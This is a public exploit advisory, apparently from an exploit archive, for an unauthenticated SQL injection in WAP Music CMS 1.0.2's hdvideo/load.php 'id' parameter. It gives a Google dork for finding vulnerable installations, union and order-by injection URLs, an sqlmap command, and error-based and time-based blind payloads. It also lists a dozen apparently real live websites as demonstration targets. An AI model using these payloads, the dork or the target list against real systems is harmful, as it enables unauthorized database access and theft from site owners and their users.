WAP Music CMS 1.0.2 SQL Injection

2016.03.28

Credit: Shelesh Rauthan

Risk: Medium

Local: No

Remote: Yes

CVE: N/A

CWE: CWE-89

Dork: inurl:"hdvideo/load.php?id="

==========================================================
[+] Title :- WAP MUSIC CMS - SQL INJECTION
[+] Date :- 24 - MAR - 2016
[+] Vendor Homepage :- www.wapforum.org
[+] Version :- All Versions
[+] Tested on :- Nginx/1.4.5, PHP/5.2.17, Linux - Windows
[+] Category :- webapps
[+] Google Dorks :- inurl:"hdvideo/load.php?id="
[+] Exploit Author :- Shelesh Rauthan (ShOrTy420 aKa SEB@sTiaN)
[+] Team name :- Team Alastor Breeze, Intelligent-Exploit
[+] Official Website :- intelligentexploit.com
[+] The official Members :- Sh0rTy420, P@rL0u$, !nfIn!Ty, Th3G0v3Rn3R, m777k
[+] Greedz to :- @@lu, Lalit, MyLappy<3, Diksha
[+] Contact :- indian.1337.hacker@gmail.com, shortycharsobeas@gmail.com
=========================================================
[+] Severity Level :- High
[+] Request Method(s) :- GET / POST
[+] Vulnerable Parameter(s) :- id
[+] Affected Area(s) :- Entire admin, database, Server
[+] About :- Unauthenticated SQL Injection via load.php Php Files causing an SQL error
[+] SQL vulnerable File :- /home/***/domains/XXX.in/public_html/hdvideo/load.php
[+] POC :- http://127.0.0.1/hdvideo/load.php?id=[SQL]'
load.php is vulnerable to sql injection Allowing an remote attacker to exploit it's web-application user account and Mysql database without any privilege.
http://www.[WEBSITE].com/hdvideo/load.php?id=XPBwXKgDTdE' order by [SQL IN4JECTION]--+
http://www.[WEBSITE].com/hdvideo/load.php?id=XPBwXKgDTdE' union all select [SQL INJECTION]--+
SQLMap
++++++++++++++++++++++++++
python sqlmap.py --url "http://127.0.0.1/hdvideo/load.php?id=[SQL]" --dbs
++++++++++++++++++++++++++
---
Parameter: id (GET)
Type: error-based
Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause
Payload: id=XPBwXKgDTdE' AND (SELECT 2092 FROM(SELECT COUNT(*),CONCAT(0x7171786a71,(SELECT (ELT(2092=2092,1))),0x716a6b6a71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.CHARACTER_SETS GROUP BY x)a) AND 'iUfJ'='iUfJ
Type: AND/OR time-based blind
Title: MySQL >= 5.0.12 AND time-based blind (SELECT)
Payload: id=XPBwXKgDTdE' AND (SELECT * FROM (SELECT(SLEEP(5)))rtdT) AND 'WFiW'='WFiW
---
[+] DEMO :- http://www.royaljatt.biz/hdvideo/load.php?id=ujUIJb575RU'
http://dj-punjab.asia/hdvideo/load.php?id=iEX2wp9-Uqg'
http://mr-mob.com/hdvideo/load.php?id=Q7xloy5fBgc'
http://mrkhan.in/hdvideo/load.php?id=4bUyibKH3xI'
http://www.nikwap.biz/hdvideo/load.php?id=Ok5booHrCKc'
http://babbumaan.co.in/hdvideo/load.php?id=SE-Wrzfk6hM'
http://jatt.tv/hdvideo/load.php?id=oQ3HEhhNzsE'
http://bollywood-music.in/hdvideo/load.php?id=7LkHC1lqqHk'
http://ipendu.in/hdvideo/load.php?id=XPBwXKgDTdE'
http://freshmaza.work/hdvideo/load.php?id=Al6Cb0fiPiE'
http://www.djjohal.co.in/hdvideo/load.php?id=gethJXA_mdM'
http://www.filmy-wap.in/hdvideo/load.php?id=xyp7UlPA3gI'
=======================================================

See this note in RAW Version

Vote for this issue:

50%

Thanks for you vote!

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.

Nick (*)

Email (*)

Video

Text (*)

(*) - required fields.

{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1

{{ x.comment }}

WAP Music CMS 1.0.2 SQL Injection

Dork: inurl:"hdvideo/load.php?id="

Thanks for you vote!

Thanks for you comment!Your message is in quarantine 48 hours.

Thanks for you comment!
Your message is in quarantine 48 hours.